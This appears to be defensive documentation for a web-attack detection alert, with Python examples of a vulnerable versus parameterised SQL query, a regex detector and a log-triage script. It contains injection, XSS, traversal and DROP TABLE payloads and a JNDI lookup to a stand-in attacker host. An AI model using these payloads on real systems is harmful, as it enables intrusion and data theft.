Suspicious Query Detection
Alert ID: suspicious_query
MITRE ATT&CK: T1190 – Exploit Public-Facing Application
Severity / Criticality
| Level | Condition |
|---|---|
| Medium | XSS patterns, 2–3 detections |
| High | Multiple XSS, path traversal, LDAP injection |
| Critical | SQL injection, code execution, XXE, flood (≥5 queries in 30 s) |
Why is it considered malicious?
- SQLi: read and modify the whole database, credentials included.
- RCE: run attacker-controlled commands on the web server.
- XSS: session theft, defacement, or phishing.
- Path traversal: access to sensitive files outside the web root.
- LDAP injection / XXE: queries against internal directory or XML services; XXE can also disclose local files and make server-side requests.
- Flood: DoS or automated exploitation.
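To make the SQLi point concrete (and the prepared-statement recommendation under mitigations), here is an added example that is not code from this page or the product it documents. It uses Python's sqlite3 with a constructed users table: the vulnerable function splices the classic `' OR '1'='1` pattern from the IOC table into the query text, the hardened one binds it as a parameter. The same vulnerable function also shows what the `UNION SELECT` vector from the trigger section extracts. The table, rows and hashes are made up.

```python
import sqlite3


def make_db():
    """Constructed sample data (not from the page): three users, one an admin."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, "
        "password_hash TEXT, is_admin INTEGER)"
    )
    conn.executemany(
        "INSERT INTO users (username, password_hash, is_admin) VALUES (?, ?, ?)",
        [("alice", "hash_a", 1), ("bob", "hash_b", 0), ("carol", "hash_c", 0)],
    )
    return conn


def lookup_vulnerable(conn, username):
    """Deliberately vulnerable: the input is concatenated into the SQL text,
    so quotes and keywords inside it are parsed as SQL."""
    sql = ("SELECT id, username, is_admin FROM users WHERE username = '"
           + username + "'")
    return conn.execute(sql).fetchall()


def lookup_prepared(conn, username):
    """Hardened: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute(
        "SELECT id, username, is_admin FROM users WHERE username = ?", (username,)
    ).fetchall()


# The two payload shapes the page lists: the tautology and UNION SELECT.
TAUTOLOGY = "' OR '1'='1"
UNION_EXFIL = "' UNION SELECT id, password_hash, is_admin FROM users--"


def compare(payload):
    """Rows returned for the same payload through each code path."""
    conn = make_db()
    return {
        "vulnerable": lookup_vulnerable(conn, payload),
        "prepared": lookup_prepared(conn, payload),
    }


if __name__ == "__main__":
    for name, payload in (("tautology", TAUTOLOGY), ("union", UNION_EXFIL)):
        result = compare(payload)
        print(name, "vulnerable ->", len(result["vulnerable"]), "rows;",
              "prepared ->", len(result["prepared"]), "rows")
        if name == "union":
            # Column 2 of the injected SELECT is password_hash, not username.
            print("leaked:", [r[1] for r in result["vulnerable"]])
```

The tautology turns the WHERE clause into `username = '' OR '1'='1'` and returns every row; the UNION payload returns the same rows but with `password_hash` in the username column, which is what "full database access" means in practice. The prepared version returns nothing for either payload because the whole string is compared as a literal username.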
When does the alert trigger?
- Real-time analysis of GET / POST / COOKIE / URI / Headers.
- Flood: ≥5 malicious queries in 30 seconds, with a 5-minute cooldown.
- Pattern detection using 200+ regexes across 6 categories.
- SQL examples: `UNION SELECT`, `OR 1=1`, `benchmark()`, `sleep()`.
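As an added illustration of the trigger logic above (example code, not the product's detector), the following Python runs the values of GET / POST / COOKIE / URI / header fields through a few regexes per category, maps the hits onto the severity table, and tracks the flood rule of five malicious requests from one IP within 30 seconds with a five-minute cooldown. The regexes are a handful standing in for the 200+ the page mentions, the JNDI lookup string is filed under RCE, and the sample requests and IP are constructed; all of that is assumption, not the product's rule set.

```python
import re
from collections import defaultdict, deque

# Illustrative patterns, a few per category (assumption: the real rule set is
# far larger; these are enough to exercise the logic).
PATTERNS = {
    "sqli": [
        r"(?i)\bunion\b[\s/*]+(all\s+)?select\b",
        r"(?i)\b(or|and)\s+['\"]?\d+['\"]?\s*=\s*['\"]?\d+",
        r"(?i)\b(benchmark|sleep)\s*\(",
        r"(?i);\s*drop\s+table\b",
    ],
    "xss": [r"(?i)<\s*script\b", r"(?i)\bon(load|error|mouseover)\s*=", r"(?i)javascript\s*:"],
    "traversal": [r"(\.\./|\.\.\\){2,}", r"(?i)/etc/passwd"],
    "rce": [r"(?i)\b(eval|system|passthru|shell_exec|exec)\s*\(", r"\$\{jndi:"],
    "xxe": [r"(?i)<!ENTITY\b", r"(?i)<!DOCTYPE[^>]*\["],
    "ldap": [r"\)\s*\(\s*[|&]", r"\*\)\s*\("],
}
COMPILED = {cat: [re.compile(p) for p in pats] for cat, pats in PATTERNS.items()}

CRITICAL = {"sqli", "rce", "xxe"}   # severity table: Critical
HIGH = {"traversal", "ldap"}        # severity table: High


def scan_request(request):
    """request maps a location (GET, POST, COOKIE, URI, HEADERS) to a string or
    to a dict of fields. Returns (category, location, matched_text) per hit."""
    hits = []
    for location, values in request.items():
        fields = values.values() if isinstance(values, dict) else [values]
        for value in fields:
            for cat, regs in COMPILED.items():
                for rx in regs:
                    m = rx.search(value)
                    if m:
                        hits.append((cat, location, m.group(0)))
                        break  # one hit per category per field is enough
    return hits


def severity(hits, flood=False):
    """Map the hits (and the flood flag) onto the page's severity table."""
    cats = {c for c, _, _ in hits}
    if flood or cats & CRITICAL:
        return "critical"
    if cats & HIGH or sum(1 for c, _, _ in hits if c == "xss") > 1:
        return "high"
    if hits:
        return "medium"   # a single XSS pattern or a few lesser detections
    return "none"


class FloodTracker:
    """Flood when one IP sends >= threshold malicious requests inside `window`
    seconds; after an alert, stay silent for that IP for `cooldown` seconds."""

    def __init__(self, threshold=5, window=30.0, cooldown=300.0):
        self.threshold, self.window, self.cooldown = threshold, window, cooldown
        self.events = defaultdict(deque)   # ip -> timestamps inside the window
        self.muted_until = {}              # ip -> end of cooldown

    def record(self, ip, now):
        q = self.events[ip]
        q.append(now)
        while q and now - q[0] > self.window:
            q.popleft()
        if len(q) < self.threshold or now < self.muted_until.get(ip, 0.0):
            return False
        self.muted_until[ip] = now + self.cooldown
        return True


def evaluate(ip, request, now, tracker):
    """Decision for one request: (severity, hits, flood_alert)."""
    hits = scan_request(request)
    flood = tracker.record(ip, now) if hits else False
    return severity(hits, flood), hits, flood


if __name__ == "__main__":
    tracker = FloodTracker()
    samples = [  # constructed requests, one attacker IP
        {"GET": {"id": "1 UNION SELECT username, password FROM users"}},
        {"POST": {"user": "' OR '1'='1"}},
        {"GET": {"q": '"><script>alert(1)</script>'}},
        {"COOKIE": {"lang": "../../../../../../etc/passwd"}},
        {"HEADERS": {"User-Agent": "${jndi:ldap://attacker.com/a}"}},
        {"GET": {"s": "hello world"}},
    ]
    for i, req in enumerate(samples):
        print(evaluate("203.0.113.5", req, 1000.0 + i, tracker))
```

Two design points worth copying: only requests that already matched a pattern feed the flood counter, so a noisy but clean client never trips it, and the cooldown is per IP so that one flooding source does not silence alerts for the others.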
Technical Indicators (IOCs)
| Type | Pattern |
|---|---|
| log_pattern (classic SQL) | `' OR '1'='1` |
| log_pattern (XSS) | `"><script>alert(1)</script>` |
| log_pattern (path traversal) | `../../../../../../etc/passwd` |
| log_pattern (SQL drop) | `'; DROP TABLE users--` |
| log_pattern (Log4j, JNDI lookup) | `${jndi:ldap://attacker.com/a}` |
Common false positives
- Requests from development tools or authorized penetration testing.
- Security plugins that run tests.
- Legitimate post content, such as code snippets.
- Misconfigured indexing bots that generate floods.
Investigation steps
- Extract the attacker's requests (`-F` matches the IP literally, so its dots are not wildcards):
  ```sh
  grep -F "IP_ADDRESS" access.log | tail -n 100
  ```
- Search for injection vectors (`-i`, because keyword case varies between tools):
  ```sh
  grep -Ei "UNION|SELECT|<script|eval" access.log
  ```
- Check whether payloads succeeded by comparing response codes and body sizes with those of benign requests to the same path: a 200 whose body is much larger or smaller than usual suggests the payload changed the response, a 500 suggests it reached the application or database, a 403 suggests it was blocked.
- For floods, identify the User-Agent and request pattern, and correlate with WAF/IDS events for the same source.
- If there are signs of exploitation, export the logs and preserve the originals as evidence before any cleanup.
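The steps above as one added, self-contained Python triage script (example code, not the product's tooling): it parses a few constructed combined-format log lines, pulls the attacker's requests, flags vectors with the same keyword list as the grep above (case-insensitively, on the URL-decoded path), judges each payload by response code and body size against benign responses for the same route, and summarises volume and User-Agents for the flood case. The IPs, paths, sizes and User-Agents are made up.

```python
import re
import statistics
from collections import Counter, defaultdict
from urllib.parse import unquote

# Apache/nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Same vectors as the grep above, matched case-insensitively on the decoded path.
VECTOR_RE = re.compile(r"union|select|<script|eval|sleep\(|\.\./|jndi:", re.IGNORECASE)

# Constructed log lines (not real traffic): one attacker IP, one benign visitor.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2024:10:00:01 +0000] "GET /product.php?id=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Mar/2024:10:00:02 +0000] "GET /product.php?id=2 HTTP/1.1" 200 5090 "-" "Mozilla/5.0"
203.0.113.5 - - [10/Mar/2024:10:00:05 +0000] "GET /product.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users HTTP/1.1" 200 9870 "-" "sqlmap/1.7"
203.0.113.5 - - [10/Mar/2024:10:00:06 +0000] "GET /product.php?id=1%27%20AND%20sleep(5)-- HTTP/1.1" 500 612 "-" "sqlmap/1.7"
203.0.113.5 - - [10/Mar/2024:10:00:07 +0000] "GET /search.php?q=%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 403 199 "-" "sqlmap/1.7"
203.0.113.5 - - [10/Mar/2024:10:00:08 +0000] "GET /download.php?f=../../../../etc/passwd HTTP/1.1" 200 1480 "-" "curl/8.4.0"
""".splitlines()


def parse(lines):
    rows = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        d = m.groupdict()
        d["status"] = int(d["status"])
        d["size"] = 0 if d["size"] == "-" else int(d["size"])
        d["path"] = unquote(d["path"])   # decode so %3Cscript%3E and friends are visible
        rows.append(d)
    return rows


def route(path):
    return path.split("?", 1)[0]


def attacker_requests(rows, ip):
    """Step 1: the attacker's requests, in log order."""
    return [r for r in rows if r["ip"] == ip]


def assess(rows, ip, tolerance=0.3):
    """Steps 2-3: the attacker's requests that carry a vector, each judged by
    status code and body size against benign 200 responses for the same route."""
    baseline = defaultdict(list)
    for r in rows:
        if r["status"] == 200 and not VECTOR_RE.search(r["path"]):
            baseline[route(r["path"])].append(r["size"])
    findings = []
    for r in attacker_requests(rows, ip):
        if not VECTOR_RE.search(r["path"]):
            continue
        sizes = baseline.get(route(r["path"]))
        if r["status"] == 403:
            verdict = "blocked"          # WAF or application refused it
        elif r["status"] >= 500:
            verdict = "server_error"     # payload reached code that failed: treat as reached
        elif r["status"] == 200 and sizes:
            typical = statistics.median(sizes)
            verdict = ("likely_success" if abs(r["size"] - typical) > tolerance * typical
                       else "unchanged_response")
        elif r["status"] == 200:
            verdict = "review"           # 200 with no benign baseline to compare against
        else:
            verdict = "unclear"
        findings.append((r["ts"], r["path"], r["status"], r["size"], verdict))
    return findings


def flood_summary(rows, ip):
    """Step 4: what a flood from this IP looks like (volume, tools, routes)."""
    mine = attacker_requests(rows, ip)
    return {
        "requests": len(mine),
        "user_agents": dict(Counter(r["ua"] for r in mine)),
        "routes": sorted({route(r["path"]) for r in mine}),
    }


if __name__ == "__main__":
    rows = parse(SAMPLE_LOG)
    for finding in assess(rows, "203.0.113.5"):
        print(finding)
    print(flood_summary(rows, "203.0.113.5"))
```

On the constructed data the UNION request comes back as likely_success because its 200 response is roughly twice the size of a normal product page, the time-based payload produced a 500, the XSS attempt was blocked with a 403, and the traversal on a route with no benign baseline is left for manual review. The 30% size tolerance is an assumption; tune it to how much a real page varies between requests.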
Recommended mitigations
Immediate
- Block the IP in the WAF/firewall.
- Apply aggressive rate limiting to the suspicious source.
- Review and revert database or file changes if exploitation succeeded.
- Enable deep payload inspection in the WAF.
Preventive
- Use a WAF with the OWASP Core Rule Set and SQLi/XSS/XXE-specific rules.
- Use prepared statements or an ORM in custom code.
- Apply strict input validation and sanitization, with context-aware output encoding for anything rendered in HTML.
- Use a Content Security Policy to reduce XSS impact.
- Configure Fail2ban jails for the detected patterns.
References
- OWASP Top 10 (A03:2021 Injection, which covers XSS)
- ModSecurity CRS
- SQLMap and web-exploitation detection guides